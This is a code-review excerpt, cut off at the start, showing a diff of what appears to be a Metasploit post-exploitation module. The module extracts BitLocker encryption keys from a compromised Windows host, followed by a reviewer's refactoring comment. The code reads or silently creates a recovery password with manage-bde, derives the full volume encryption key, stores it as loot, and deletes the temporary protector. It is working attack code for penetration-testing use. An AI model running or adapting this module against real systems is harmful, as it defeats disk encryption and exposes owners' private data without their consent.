modules/post/windows/gather/bitlocker_fvek.rb

```diff
@@ -0,0 +1,143 @@
+                                            0)
+
+    if r['GetLastError'] != ERROR::SUCCESS
+      fail_with(Failure::Unknown,
+        "Error opening #{drive_letter}. Windows Error Code: #{r['GetLastError']}
+         - #{r['ErrorMessage']}")
+    end
+
+    @handle = r['return']
+    print_good("Successfuly opened Disk #{drive_number}")
+    seek_relative_volume(0)
+
+    print_status('Trying to gather a recovery key')
+
+    cmd_out = cmd_exec("#{system_root}\\sysnative\\manage-bde.exe",
+                       "-protectors -get #{drive_letter}:")
+
+    recovery_key = cmd_out.match(/((\d{6}-){7}\d{6})/)
+
+    if !recovery_key.nil?
+      recovery_key = recovery_key[1]
+      print_good("Recovery key found : #{recovery_key}")
+    else
+      print_status('No recovery key found, trying to generate a new recovery key')
+      cmd_out = cmd_exec("#{system_root}\\sysnative\\manage-bde.exe",
+                         "-protectors -add #{drive_letter}: -RecoveryPassword")
+      recovery_key = cmd_out.match(/((\d{6}-){7}\d{6})/)
+      id_key_tmp = cmd_out.match(/(\{[^\}]+\})/)
+      if !recovery_key.nil?
+        recovery_key = recovery_key[1]
+        id_key_tmp = id_key_tmp[1]
+        print_good("Recovery key generated successfuly : #{recovery_key}")
+      else
+        print_status('Recovery Key generation failed')
+        if !datastore['RECOVERY_KEY'].nil?
+          print_status('Using provided recovery key')
+          recovery_key = datastore['RECOVERY_KEY']
+        else
+          print_status('No recovery key can be used')
+          return
+        end
+      end
+    end
+
+    begin
+      @bytes_read = 0
+      fs = Rex::Parser::BITLOCKER.new(self)
+      print_status('The recovery key derivation usually take 20 seconds...')
+      fvek = fs.fvek_from_recovery_password_dislocker(recovery_key)
+      if fvek != '' &&  !fvek.nil?
+        stored_path = store_loot('windows.file', 'application/octet-stream',
+                                 session, fvek)
+        print_good("Successfuly extract FVEK in #{stored_path}")
+        print_good('This hard drive could later be decrypted using : dislocker -k <key_file> ...')
+      else
+        print_bad('Failed to generate FVEK, wrong recovery key?')
+      end
+    ensure
+      unless id_key_tmp.nil?
+        print_status('Deleting temporary recovery key')
+        cmd_exec("#{system_root}\\sysnative\\manage-bde.exe",
+                 "-protectors -delete #{drive_letter}: -id #{id_key_tmp}")
+      end
+      client.railgun.kernel32.CloseHandle(@handle)
+    end
+    print_status('Post Successful')
+  end
+
+  def read(size)
+    client.railgun.kernel32.ReadFile(@handle, size, size, 4, nil)['lpBuffer']
+  end
+
+  def seek(offset)
+    high_offset = offset >> 32
+    low_offset = offset & (2**33 - 1)
+    client.railgun.kernel32.SetFilePointer(@handle, low_offset, high_offset, 0)
+  end
+
+  def seek_relative_volume(offset)
```

Comment:
Unless I am misreading this, `Rex::Parser::BITLOCKER` depends on this module because `seek_relative_volume` (and probably `seek` and `read`...) are defined here.  You should move them elsewhere -- either to the `BITLOCKER` class as a class method, or maybe to a mixin.  This'll become even more necessary once someone writes a spec for `BITLOCKER`